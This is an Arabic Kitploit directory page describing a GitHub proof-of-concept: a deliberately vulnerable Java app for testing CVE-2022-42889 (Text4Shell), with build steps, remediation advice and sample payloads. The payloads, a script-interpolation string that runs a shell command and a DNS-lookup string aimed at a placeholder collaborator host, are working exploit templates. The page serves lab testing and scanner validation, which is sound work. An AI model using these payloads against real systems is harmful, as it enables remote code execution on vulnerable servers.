Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
text4shell-poc — تطبيق إثبات مفهوم لاختبار CVE-2022-42889 | Kitploit
أدوات/GitHubGitHub/securekomodo/text4shell-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubsecurekomodo/text4shell-poc

text4shell-poc

تطبيق إثبات مفهوم لاختبار CVE-2022-42889

عرض المستودع
8111منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تطبيق اختبار CVE-2022-42889 PoC

هذا تطبيق ضعيف تم تطويره كإثبات مفهوم (Proof of Concept) للثغرة الأمنية CVE-2022-42889.

تثبيت Maven

لتشغيل هذا ستحتاج إلى:

  • JDK 17 أو أحدث
  • Maven
  1. استنساخ مستودع git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. تنفيذ تثبيت Maven لإنشاء ملف JAR
root@kitploit:~
mvn clean install

سيؤدي هذا إلى إنشاء مجلد ./target وداخل ذلك المجلد سيكون ملف JAR text4shell-poc-0.0.1-SNAPSHOT.jar

  1. تشغيل خادم الويب
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

سيؤدي هذا إلى تشغيل خادم ويب على localhost لديك يستمع على المنفذ 8080 افتراضيًا

  1. تصفح إلى خادم الويب

قم بالوصول إلى خادم الويب على http://localhost:8080/ ويجب أن ترى المخرجات التالية

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. استغل الثغرة يدويًا أو قم بإجراء فحص باستخدام text4shell-scan

نماذج لحمولات الاستغلال

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

مُرمِّز URL الموصى به لعرض استغلال ناجح: https://www.urlencoder.org/.

Docker

بدلاً من ذلك، يمكنك استخدام Docker لتتمكن من تشغيل هذا الـ PoC:

  1. استنساخ مستودع git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. بناء Docker
root@kitploit:~
docker build --tag=text4shell-poc .
  1. تشغيل Docker
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. اختبار التطبيق الضعيف
root@kitploit:~
http://localhost/
  1. يمكن تنفيذ الهجوم عن طريق تمرير سلسلة نصية “${prefix:name}” كما هو موضح أدناه:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

مُرمِّز URL الموصى به لعرض استغلال ناجح: https://www.urlencoder.org/.

بدلاً من ذلك، يمكنك التحقق من فعالية أدوات الفحص مثل text4shell-scan

هل أنت معرّض للثغرة؟

لكي يكون كودك ضعيفًا، يجب أن:

  • تقوم بتشغيل إصدار من Apache commons-text ابتداءً من الإصدار 1.5.0 وحتى (وليس بما في ذلك) 1.10.0
  • استخدام Interpolation في StringSubstituion خاصتك (انظر https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) - لاحظ أن هذا ليس شائعًا جدًا

الإصلاح

الإصلاح لهذه الثغرة هو تحديث نسخ commons-text لديك إلى الإصدارات 1.10.0 أو أحدث.

المؤلف

Bryan Smith

  • تويتر: https://twitter.com/securekomodo
تنزيل الأداة